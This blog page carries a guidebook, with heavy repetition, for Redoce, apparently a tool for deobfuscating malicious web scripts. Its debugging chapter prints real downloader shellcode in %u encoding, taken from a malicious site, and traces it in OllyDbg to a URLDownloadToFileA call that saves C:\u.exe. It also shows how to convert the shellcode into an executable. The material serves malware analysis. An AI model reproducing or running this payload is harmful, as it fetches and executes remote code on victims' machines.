Welcome to CHENOE 's Weblog!
Jun
1
Redoce使用说明 (中文版)
Redoce使用手册之一:什么是Redoce
Redoce使用手册之二:准备工作
Redoce使用手册之三:开始解密
Redoce使用手册之四:设置程序
Redoce使用手册之五:深入程序(一)
Redoce使用手册之六:深入程序(二)
Redoce使用手册之七:深入程序(三)
Redoce使用手册之八:调试ShellCode
更多关于Redoce信息请查看我的博客Safelab.spaces.live.com
Redoce guidebook (English version)
Guidebook - Chapter I - 'What is Redoce?'
Guidebook - Chapter II - 'Time to begin'
Guidebook - Chapter III - 'First tour to Mal-www'
Guidebook - Chapter IV - 'Setting Redoce'
Guidebook - Chapter V - 'Advancing (I)'
Guidebook - Chapter VI - 'Advancing (II)'
Guidebook - Chapter VII - 'Advancing (III)'
Guidebook - Chapter VIII - 'Debugging'
Something more about Redoce please visit my blogSafelab.spaces.live.com
Redoce使用手册之一:什么是Redoce
Redoce使用手册之二:准备工作
Redoce使用手册之三:开始解密
Redoce使用手册之四:设置程序
Redoce使用手册之五:深入程序(一)
Redoce使用手册之六:深入程序(二)
Redoce使用手册之七:深入程序(三)
Redoce使用手册之八:调试ShellCode
更多关于Redoce信息请查看我的博客Safelab.spaces.live.com
Redoce guidebook (English version)
Guidebook - Chapter I - 'What is Redoce?'
Guidebook - Chapter II - 'Time to begin'
Guidebook - Chapter III - 'First tour to Mal-www'
Guidebook - Chapter IV - 'Setting Redoce'
Guidebook - Chapter V - 'Advancing (I)'
Guidebook - Chapter VI - 'Advancing (II)'
Guidebook - Chapter VII - 'Advancing (III)'
Guidebook - Chapter VIII - 'Debugging'
Something more about Redoce please visit my blogSafelab.spaces.live.com
Jun
1
If you keep reading my article from the first one, you will know what the 'shellcode' stands for, I thought. If you really don't understand what it is , it is recommend that you look back on what it was
http://www.chenoe.com/blog/read.php?14
So, how can I know this shellcode will download something from some place, or more exactly let me know what it did? Here we need to debug the shellcode. Shellcode is a part of an executable , you can consider it like this. If so, what it did must can be known by us clevers :) (my ego was increasing....just a joke, let's continue). Then, an old problem, how?
1, Start Redoce.
2, Read malicious site hxxp://www0.ibds3.cn/ccbf.css or other you want to debug, (but please remember to check if this shellcode is completely shown to you but not splited in many .js files.), select YT, right-click, then select, replace to %u, then we can get a part of shellcode like:
What's this stack of numbers!? Some experienced 'players' (ya, we are just the players) may begin reading the code , EB , emm, it represents 'jmp ..'. Now, no need to trouble ourselves a lot, give this heavy translating work to debugger (although it's a financial crisis, debugger must have their jobs done, what a bummer if debugger is striking!), move your hand , or , exactly , your mouse, Functions- Execute- 9>Shellcode to Exe, or just type 9, click [Begin].
Copy shellcode to the textbox upside, like:

Then click [Delete invaild chars] ,followed by [2 bytes xchg] (because they are %u , high bits need to be changed with lowb bits), the last [Generat EXE file], you will see an exe is now standing (or .. laying ..?) at the place you typed.

Then we start OllyDebug, 'the best ring-3 debugger' --- it's ads said like this. You don't need to know too much but these:
1. F8: Step over, execute a piece of code , of course it will consider all codes in a 'call' is also 'one' piece of code, so it will try to execute all of them at one time.
2. F7: Step into, silmiar with F8, differently it will consider a 'call' is consisted of may codes, it will step into a 'call'.
3. F2: Set breakpoint, a bp will tell debugger where to pause.
4. F9: Run, you need to let F9 co-operate with F2.
5. F4: Bp and Run, another state of F2+F9.
6. jmp: Jump with no condition
7. je/jz: Jump if zero jne/jnz:Jump if not zero
8. nop (0x90): = xchg eax,eax ; this command will take no action. this is what i need to replenish after some people asked me.
After program loaded, we are paused at 405000:
00405000 > /EB 54 jmp short 00405056
00405002 |8B75 3C mov esi, dword ptr [ebp+3C]
00405005 |8B7435 78 mov esi, dword ptr [ebp+esi+78]
Emm, a jmp, F8, let's jump together. Where? 405056, xor eax,eax? , zero the eax register, ignore it because we are all having a originally purpose--------- find url , so let's go deeper in this program:
00405056 33C0 xor eax, eax
00405058 64:0340 30 add eax, dword ptr fs:[eax+30]
0040505C 78 0C js short 0040506A
0040505E 8B40 0C mov eax, dword ptr [eax+C]
00405061 8B70 1C mov esi, dword ptr [eax+1C]
00405064 AD lods dword ptr [esi]
00405065 8B40 08 mov eax, dword ptr [eax+8]
We are coming to call 405002, please notice here you're DEBUGGING A DANGEROUS, MALICIOUS SHELLCODE, you may need to take notice whether it will connect to internet then download a bomb into your computer, if it will do like this, do carefully , don't chicly press an F8, if you did, then- game over, you need to repair your computer now but not debugging (of course, it's better debugging it in Sandboxie, VM, and this will not bring some damage to your real system.)
Press [Enter] to see it's commands, no calls, click [C] on Ollydebug to return.
00405074 BF 8E4E0EEC mov edi, EC0E4E8E
00405079 E8 84FFFFFF call 00405002
0040507E 83EC 04 sub esp, 4
Then we are arriving at the next one,call eax, OD tells us that eax is reference to LoadLibraryA, so program here is calling LoadLibraryA, this will allow a program load a dll into memory space. Often there is a GetProcAddress afterwards, F8, let's step over, I bet you don't want to deeply know how LoadLibraryA works because our purpose isn't that..
00405085 FFD0 call eax ; kernel32.LoadLibraryA
Somewhere behinds, a jmp brings eip to 4050C5, please notice, here call 4050A1 is a previous address, raise your head, oh no, raise your cursor, it's 'push ebx', followed by a call eax, so we need to F7 step into to see what trick it's doing.
0040509F /EB 24 jmp short 004050C5
004050A1 |53 push ebx
004050A2 |FFD0 call eax
004050A4 |5D pop ebp
004050A5 |BF 98FE8A0E mov edi, 0E8AFE98
004050AA |E8 53FFFFFF call 00405002
004050AF |83EC 04 sub esp, 4
004050B2 |832C24 62 sub dword ptr [esp], 62
004050B6 |FFD0 call eax
004050B8 |BF 7ED8E273 mov edi, 73E2D87E
004050BD |E8 40FFFFFF call 00405002
004050C2 |52 push edx
004050C3 |FFD0 call eax
004050C5 \E8 D7FFFFFF call 004050A1
Using URLDownloadToFileA(->urlmon.dll) in a hurry, this function allows program connect to internet then download a file to local drives,so in a trojan, URLDownloadToFile(A/W), URLDownloadToCacheFile(A/W) may cause your special attention!
004050A1 53 push ebx
004050A2 FFD0 call eax ; urlmon.URLDownloadToFileA
004050A4 5D pop ebp
F7, step into, we can see, here he is pushing the first param of URLDownloadToFileA, in other words, he is telling system, where,what,how i will download it. We can clearly see he pushed C:\u.exe (3rd param of URLDownloadToFileA, specific saving position.).If you are interested in it, you can step into URLDownloadToFileA, then you will found, it will convert ansi chars to unicode chars then call URLDownloadToFileW.Of course this is what we need to do some days(or months?) later, after all, this article is telling you how to debug a Shellcode in a simple way but not analysis the program :) , maybe you need to read some professional books but not listen to the joke made by me , a newbie in this area :) .
421379A4 8B5D 10 mov ebx, dword ptr [ebp+10]
421379A7 56 push esi
421379A8 8B75 0C mov esi, dword ptr [ebp+C] ; MyOutPut.004050CA
421379AB 57 push edi

So, end our article.
http://www.chenoe.com/blog/read.php?14
So, how can I know this shellcode will download something from some place, or more exactly let me know what it did? Here we need to debug the shellcode. Shellcode is a part of an executable , you can consider it like this. If so, what it did must can be known by us clevers :) (my ego was increasing....just a joke, let's continue). Then, an old problem, how?
1, Start Redoce.
2, Read malicious site hxxp://www0.ibds3.cn/ccbf.css or other you want to debug, (but please remember to check if this shellcode is completely shown to you but not splited in many .js files.), select YT, right-click, then select, replace to %u, then we can get a part of shellcode like:
%u54EB%u758B%u8B3C%u3574%u0378%u56F5%u768B%u0320%u33F5%u49C9%uAD41%uDB33%u0F36%u14BE%u3828%u74F2%uC108%u0DCB%uDA03%uEB40%u3BEF%u75DF%u5EE7%u5E8B%u0324%u66DD%u0C8B%u8B4B%u1C5E%uDD03%u048B%u038B%uC3C5%u7275%u6D6C%u6E6F%u642E%u6C6C%u4300%u5C3A%u2e55%u7865%u0065%uC033%u0364%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0840%u09EB%u408B%u8D34%u7C40%u408B%u953C%u8EBF%u0E4E%uE8EC%uFF84%uFFFF%uEC83%u8304%u242C%uFF3C%u95D0%uBF50%u1A36%u702F%u6FE8%uFFFF%u8BFF%u2454%u8DFC%uBA52%uDB33%u5353%uEB52%u5324%uD0FF%uBF5D%uFE98%u0E8A%u53E8%uFFFF%u83FF%u04EC%u2C83%u6224%uD0FF%u7EBF%uE2D8%uE873%uFF40%uFFFF%uFF52%uE8D0%uFFD7%uFFFF%u7468%u7074%u2F3A%u642F%u2E39%u7469%u7333%u2E35%u6F63%u2F6D%u3930%u782F%u632E%u7373%u0000
What's this stack of numbers!? Some experienced 'players' (ya, we are just the players) may begin reading the code , EB , emm, it represents 'jmp ..'. Now, no need to trouble ourselves a lot, give this heavy translating work to debugger (although it's a financial crisis, debugger must have their jobs done, what a bummer if debugger is striking!), move your hand , or , exactly , your mouse, Functions- Execute- 9>Shellcode to Exe, or just type 9, click [Begin].
Copy shellcode to the textbox upside, like:
Then click [Delete invaild chars] ,followed by [2 bytes xchg] (because they are %u , high bits need to be changed with lowb bits), the last [Generat EXE file], you will see an exe is now standing (or .. laying ..?) at the place you typed.
Then we start OllyDebug, 'the best ring-3 debugger' --- it's ads said like this. You don't need to know too much but these:
1. F8: Step over, execute a piece of code , of course it will consider all codes in a 'call' is also 'one' piece of code, so it will try to execute all of them at one time.
2. F7: Step into, silmiar with F8, differently it will consider a 'call' is consisted of may codes, it will step into a 'call'.
3. F2: Set breakpoint, a bp will tell debugger where to pause.
4. F9: Run, you need to let F9 co-operate with F2.
5. F4: Bp and Run, another state of F2+F9.
6. jmp: Jump with no condition
7. je/jz: Jump if zero jne/jnz:Jump if not zero
8. nop (0x90): = xchg eax,eax ; this command will take no action. this is what i need to replenish after some people asked me.
After program loaded, we are paused at 405000:
00405000 > /EB 54 jmp short 00405056
00405002 |8B75 3C mov esi, dword ptr [ebp+3C]
00405005 |8B7435 78 mov esi, dword ptr [ebp+esi+78]
Emm, a jmp, F8, let's jump together. Where? 405056, xor eax,eax? , zero the eax register, ignore it because we are all having a originally purpose--------- find url , so let's go deeper in this program:
00405056 33C0 xor eax, eax
00405058 64:0340 30 add eax, dword ptr fs:[eax+30]
0040505C 78 0C js short 0040506A
0040505E 8B40 0C mov eax, dword ptr [eax+C]
00405061 8B70 1C mov esi, dword ptr [eax+1C]
00405064 AD lods dword ptr [esi]
00405065 8B40 08 mov eax, dword ptr [eax+8]
We are coming to call 405002, please notice here you're DEBUGGING A DANGEROUS, MALICIOUS SHELLCODE, you may need to take notice whether it will connect to internet then download a bomb into your computer, if it will do like this, do carefully , don't chicly press an F8, if you did, then- game over, you need to repair your computer now but not debugging (of course, it's better debugging it in Sandboxie, VM, and this will not bring some damage to your real system.)
Press [Enter] to see it's commands, no calls, click [C] on Ollydebug to return.
00405074 BF 8E4E0EEC mov edi, EC0E4E8E
00405079 E8 84FFFFFF call 00405002
0040507E 83EC 04 sub esp, 4
Then we are arriving at the next one,call eax, OD tells us that eax is reference to LoadLibraryA, so program here is calling LoadLibraryA, this will allow a program load a dll into memory space. Often there is a GetProcAddress afterwards, F8, let's step over, I bet you don't want to deeply know how LoadLibraryA works because our purpose isn't that..
00405085 FFD0 call eax ; kernel32.LoadLibraryA
Somewhere behinds, a jmp brings eip to 4050C5, please notice, here call 4050A1 is a previous address, raise your head, oh no, raise your cursor, it's 'push ebx', followed by a call eax, so we need to F7 step into to see what trick it's doing.
0040509F /EB 24 jmp short 004050C5
004050A1 |53 push ebx
004050A2 |FFD0 call eax
004050A4 |5D pop ebp
004050A5 |BF 98FE8A0E mov edi, 0E8AFE98
004050AA |E8 53FFFFFF call 00405002
004050AF |83EC 04 sub esp, 4
004050B2 |832C24 62 sub dword ptr [esp], 62
004050B6 |FFD0 call eax
004050B8 |BF 7ED8E273 mov edi, 73E2D87E
004050BD |E8 40FFFFFF call 00405002
004050C2 |52 push edx
004050C3 |FFD0 call eax
004050C5 \E8 D7FFFFFF call 004050A1
Using URLDownloadToFileA(->urlmon.dll) in a hurry, this function allows program connect to internet then download a file to local drives,so in a trojan, URLDownloadToFile(A/W), URLDownloadToCacheFile(A/W) may cause your special attention!
004050A1 53 push ebx
004050A2 FFD0 call eax ; urlmon.URLDownloadToFileA
004050A4 5D pop ebp
F7, step into, we can see, here he is pushing the first param of URLDownloadToFileA, in other words, he is telling system, where,what,how i will download it. We can clearly see he pushed C:\u.exe (3rd param of URLDownloadToFileA, specific saving position.).If you are interested in it, you can step into URLDownloadToFileA, then you will found, it will convert ansi chars to unicode chars then call URLDownloadToFileW.Of course this is what we need to do some days(or months?) later, after all, this article is telling you how to debug a Shellcode in a simple way but not analysis the program :) , maybe you need to read some professional books but not listen to the joke made by me , a newbie in this area :) .
421379A4 8B5D 10 mov ebx, dword ptr [ebp+10]
421379A7 56 push esi
421379A8 8B75 0C mov esi, dword ptr [ebp+C] ; MyOutPut.004050CA
421379AB 57 push edi
So, end our article.
Jun
1
[Calculate][List]
Items listed here are all bit calculating functions, you need to have the param box filled with correct param then use these functions.
Then, how can I made my experience more simple?
Yes, of course, like you can
1, Double-click URL list then program will automaticly load it.
2, Click button [P], program will automaticly try to decode current page.
3, Select a part of code then click button [C], program will keep the selected part in textbox , this will make program processing faster.
4, When a hxxp in URL box , no need to modify program will correct it to http
5, Double-click the step-box, it will be emptied.
Give some introduce to some seldom-used functions,plz.
Ok, frequently used functions will put at where your mouse can move to easily :), and others such like [+] button, it can force adding a URL to URL listbox, then [M] button, this will pop-up a batch-auto-dec window, this will allow you use autodecode function to many URLs without clicking the button one-by-one. Program also have three buffer textbox, if you did something wrong, you can click [1+], [1-] buttons to reset what you've done.
How fast will you lazy man update it?
Not sure, if program itself can adapt to what you need, or , no bugs were found, program will not add some new functions.
How to report a problem to you?
You can click link [Report] then fill the data you want to report, click [Submit], then I'll know.
Also ,you can contact me at 597432784#qq.com [replace # to @].
That's all. Some advanced actions such as debugging, please check : Guidebook - Chapter VIII - 'Debugging'
Items listed here are all bit calculating functions, you need to have the param box filled with correct param then use these functions.
Then, how can I made my experience more simple?
Yes, of course, like you can
1, Double-click URL list then program will automaticly load it.
2, Click button [P], program will automaticly try to decode current page.
3, Select a part of code then click button [C], program will keep the selected part in textbox , this will make program processing faster.
4, When a hxxp in URL box , no need to modify program will correct it to http
5, Double-click the step-box, it will be emptied.
Give some introduce to some seldom-used functions,plz.
Ok, frequently used functions will put at where your mouse can move to easily :), and others such like [+] button, it can force adding a URL to URL listbox, then [M] button, this will pop-up a batch-auto-dec window, this will allow you use autodecode function to many URLs without clicking the button one-by-one. Program also have three buffer textbox, if you did something wrong, you can click [1+], [1-] buttons to reset what you've done.
How fast will you lazy man update it?
Not sure, if program itself can adapt to what you need, or , no bugs were found, program will not add some new functions.
How to report a problem to you?
You can click link [Report] then fill the data you want to report, click [Submit], then I'll know.
Also ,you can contact me at 597432784#qq.com [replace # to @].
That's all. Some advanced actions such as debugging, please check : Guidebook - Chapter VIII - 'Debugging'
Jun
1
Let's go on.
[Deobfuscation] [List]
[1>Remove quotation marks] This will remove both " and ' in whole code area.
[2>Remove "\"] This will remove all \ in code area.
[3>Connect(Remove "+")] This will replace multi-spaces to single-space also "+"," + ",'+',' + ' will be removed.
[4>Customized Replacing] You can tell Redoce what you want to replace from and to.
[5>JS Format(;)] This will append some return keys and tab keys after ; , { and }.
[6>VBS Format(:)] This will append some return keys and tab keys after :.
[7>Connect lines] This will remove all return keys.
[Execute] [List]
[1>Execute VBS[with Sub Main]] This will allow you execute VBScript inside Redoce.
Example 1:
dim a,b
a=4
b=6
msgbox cstr(a+b)
Example 2:
sub main()
dim a,b
a=4
b=6
msgbox sum(a,b)
end sub
function sum(a,b)
sum=a+b
end function
[2>Base64 Encrypt] This will allow you encrypt data in code textbox with Base 64 arithmetic.
[3>Mark 'Eval'] ~ [7>Continuously marking 'Http'] This will allow program mark the specific words in code area. All functions will only mark the first one except for '7' .
[8>Batch Downloading] This will allow you download a 'stack' of files. If any file is already exists, this file will be automatic renamed.
[9>ShellCode To Exe] This will allow you create an executable for debugging with a part of shellcode that you already had.
(Attention!!)WARNING: shellcode from malicious sites are often malicious too, if you execute an executable file generated according to that malicious code, you might caught a virus unexpectly. Generated executables are only permit to be executed in a vitual-environment for debugging use.
[A>PDF/CWS/Zlib Extractor] This will allow you extract data from compressed data streams in PDF 1.3,1.4,1.5 or any version supported, and CWS files (Compressed swf) , Zlib compressed files.
[B>Characters Searching(Param)] This will allow you search strings that you specified.
[C>Execute JS with ReturnValue[Include Function and RetVal]] [D>Execute JSEval with ReturnValue[Must be standard format]] This will allow you execute Javascript inside program but it seems to have some probles..
That's all folks, any further information please check : Guidebook - Chapter VII - 'Advancing (III)'
[Deobfuscation] [List]
[1>Remove quotation marks] This will remove both " and ' in whole code area.
[2>Remove "\"] This will remove all \ in code area.
[3>Connect(Remove "+")] This will replace multi-spaces to single-space also "+"," + ",'+',' + ' will be removed.
[4>Customized Replacing] You can tell Redoce what you want to replace from and to.
[5>JS Format(;)] This will append some return keys and tab keys after ; , { and }.
[6>VBS Format(:)] This will append some return keys and tab keys after :.
[7>Connect lines] This will remove all return keys.
[Execute] [List]
[1>Execute VBS[with Sub Main]] This will allow you execute VBScript inside Redoce.
Example 1:
dim a,b
a=4
b=6
msgbox cstr(a+b)
Example 2:
sub main()
dim a,b
a=4
b=6
msgbox sum(a,b)
end sub
function sum(a,b)
sum=a+b
end function
[2>Base64 Encrypt] This will allow you encrypt data in code textbox with Base 64 arithmetic.
[3>Mark 'Eval'] ~ [7>Continuously marking 'Http'] This will allow program mark the specific words in code area. All functions will only mark the first one except for '7' .
[8>Batch Downloading] This will allow you download a 'stack' of files. If any file is already exists, this file will be automatic renamed.
[9>ShellCode To Exe] This will allow you create an executable for debugging with a part of shellcode that you already had.
(Attention!!)WARNING: shellcode from malicious sites are often malicious too, if you execute an executable file generated according to that malicious code, you might caught a virus unexpectly. Generated executables are only permit to be executed in a vitual-environment for debugging use.
[A>PDF/CWS/Zlib Extractor] This will allow you extract data from compressed data streams in PDF 1.3,1.4,1.5 or any version supported, and CWS files (Compressed swf) , Zlib compressed files.
[B>Characters Searching(Param)] This will allow you search strings that you specified.
[C>Execute JS with ReturnValue[Include Function and RetVal]] [D>Execute JSEval with ReturnValue[Must be standard format]] This will allow you execute Javascript inside program but it seems to have some probles..
That's all folks, any further information please check : Guidebook - Chapter VII - 'Advancing (III)'
Apr
18
·Telling so much on Settings, tell us something about what functions do program have now!
OK, about 3 articles will be wrote to tell you the details about functions.
·Where shall i begin?
Function area.
[Param] [TextBox]
Specify the parameter, many functions with '(Param/NonParam)' or only '(Param)' may need value filled here.
[%uX] [Button]
Order Redoce to guess Xor key for Shellcode in %uABCD format. Because the generator in China often use XOR encrypt and decrypt code when shellcoding running, so in order not to debug everytime we decoding, we add this function.
Known problem: Redoce may 'guess' the xor key although there's no xor key..
Known problem: Redoce may 'guess' wrong xor key.
What is ShellCode
In computer security, a shellcode is a small piece of code used as the payload in the exploitation of a software vulnerability. It is called "shellcode" because it typically starts a command shell from which the attacker can control the compromised machine. Shellcode is commonly written in machine code, but any piece of code that performs a similar task can be called shellcode. Because the function of a payload is not limited to merely spawning a shell, some have suggested that the name shellcode is insufficient. However, attempts at replacing the term have not gained wide acceptance.
From: http://en.wikipedia.org/wiki/Shellcode
[Decode] [List]
[1>Unescape(\x,\,%)(Param/NonParam)] As what it named, this function can restore hex \x, oct \, hex % to ANSI chars.
Known problem: in order to improve decoding speed, program will not coding ansi to unicode chars, so if you escape some unicode characters then use this function, Redoce won't show you the unicode chars but instead some ansi chars instead. All functions except Base64 decrypt will all run in this way.
[2>Base64 Decode] Program will decode a sequence of char as they are encrypted using Base64 arithmetic.
What is Base64?
The term Base64 refers to a specific MIME content transfer encoding. It is also used as a generic term for any similar encoding scheme that encodes binary data by treating it numerically and translating it into a base 64 representation. The particular choice of base is due to the history of character set encoding: one can choose a set of 64 characters that is both part of the subset common to most encodings, and also printable. This combination leaves the data unlikely to be modified in transit through systems, such as email, which were traditionally not 8-bit clean.
From: http://en.wikipedia.org/wiki/Base64
[3>Alpha2 Decode] [Special thanks to jimmyleo] Program will decode a sequence of char as they are encrypted using Alpha 2 arithmetic.
[4>USASCII Decode] Program will decode a sequence of char as they are encoded to USASCII
what is USASCII?
See: http://en.wikipedia.org/wiki/USASCII
[5>Unicode Decode(%u,\u)(Param/NonParam)] This can restore %u,\u encoded chars to ansi char.
[6>Eval() Decode(Beta!)] This program will let IE execute script to get the result of eval.
(Dangerous!) Notice: may be dangerous when using Ie executing code, please make sure there's nothing but eval in script.
[7>StrReverse] Reverse the string.
[8>HexAscii Decode] This function will get text in code area in 2 bytes each then restore to ansi chars.
[9> Decode(,)] This can restore , encoded chars to ansi char.
[A>XOR Key Enumerate] This function can enumerate xor key.
What is xor(Exclusive or)?
Please visit: http://en.wikipedia.org/wiki/Xor
[B>Collect data in quotation marks] This function can get all texts in ", better set customized dec metod in right-click : -db-d7 , this will allow program kill cr and lf chars after collect.
[C>JS.Encode Decode] This function can restore JavaScriptEncoded chars.
[D>CryptHTML Decode(Beta!)] This program will let IE execute script to get the result of Document.Write. Also be effective on code which encoded by HTMLShip.
(Dangerous!) Notice: may be dangerous when using Ie executing code, please make sure there's nothing but document.write in script.
That's all.
OK, about 3 articles will be wrote to tell you the details about functions.
·Where shall i begin?
Function area.
[Param] [TextBox]
Specify the parameter, many functions with '(Param/NonParam)' or only '(Param)' may need value filled here.
[%uX] [Button]
Order Redoce to guess Xor key for Shellcode in %uABCD format. Because the generator in China often use XOR encrypt and decrypt code when shellcoding running, so in order not to debug everytime we decoding, we add this function.
Known problem: Redoce may 'guess' the xor key although there's no xor key..
Known problem: Redoce may 'guess' wrong xor key.
What is ShellCode
In computer security, a shellcode is a small piece of code used as the payload in the exploitation of a software vulnerability. It is called "shellcode" because it typically starts a command shell from which the attacker can control the compromised machine. Shellcode is commonly written in machine code, but any piece of code that performs a similar task can be called shellcode. Because the function of a payload is not limited to merely spawning a shell, some have suggested that the name shellcode is insufficient. However, attempts at replacing the term have not gained wide acceptance.
From: http://en.wikipedia.org/wiki/Shellcode
[Decode] [List]
[1>Unescape(\x,\,%)(Param/NonParam)] As what it named, this function can restore hex \x, oct \, hex % to ANSI chars.
Known problem: in order to improve decoding speed, program will not coding ansi to unicode chars, so if you escape some unicode characters then use this function, Redoce won't show you the unicode chars but instead some ansi chars instead. All functions except Base64 decrypt will all run in this way.
[2>Base64 Decode] Program will decode a sequence of char as they are encrypted using Base64 arithmetic.
What is Base64?
The term Base64 refers to a specific MIME content transfer encoding. It is also used as a generic term for any similar encoding scheme that encodes binary data by treating it numerically and translating it into a base 64 representation. The particular choice of base is due to the history of character set encoding: one can choose a set of 64 characters that is both part of the subset common to most encodings, and also printable. This combination leaves the data unlikely to be modified in transit through systems, such as email, which were traditionally not 8-bit clean.
From: http://en.wikipedia.org/wiki/Base64
[3>Alpha2 Decode] [Special thanks to jimmyleo] Program will decode a sequence of char as they are encrypted using Alpha 2 arithmetic.
[4>USASCII Decode] Program will decode a sequence of char as they are encoded to USASCII
what is USASCII?
See: http://en.wikipedia.org/wiki/USASCII
[5>Unicode Decode(%u,\u)(Param/NonParam)] This can restore %u,\u encoded chars to ansi char.
[6>Eval() Decode(Beta!)] This program will let IE execute script to get the result of eval.
(Dangerous!) Notice: may be dangerous when using Ie executing code, please make sure there's nothing but eval in script.
[7>StrReverse] Reverse the string.
[8>HexAscii Decode] This function will get text in code area in 2 bytes each then restore to ansi chars.
[9> Decode(,)] This can restore , encoded chars to ansi char.
[A>XOR Key Enumerate] This function can enumerate xor key.
What is xor(Exclusive or)?
Please visit: http://en.wikipedia.org/wiki/Xor
[B>Collect data in quotation marks] This function can get all texts in ", better set customized dec metod in right-click : -db-d7 , this will allow program kill cr and lf chars after collect.
[C>JS.Encode Decode] This function can restore JavaScriptEncoded chars.
[D>CryptHTML Decode(Beta!)] This program will let IE execute script to get the result of Document.Write. Also be effective on code which encoded by HTMLShip.
(Dangerous!) Notice: may be dangerous when using Ie executing code, please make sure there's nothing but document.write in script.
That's all.


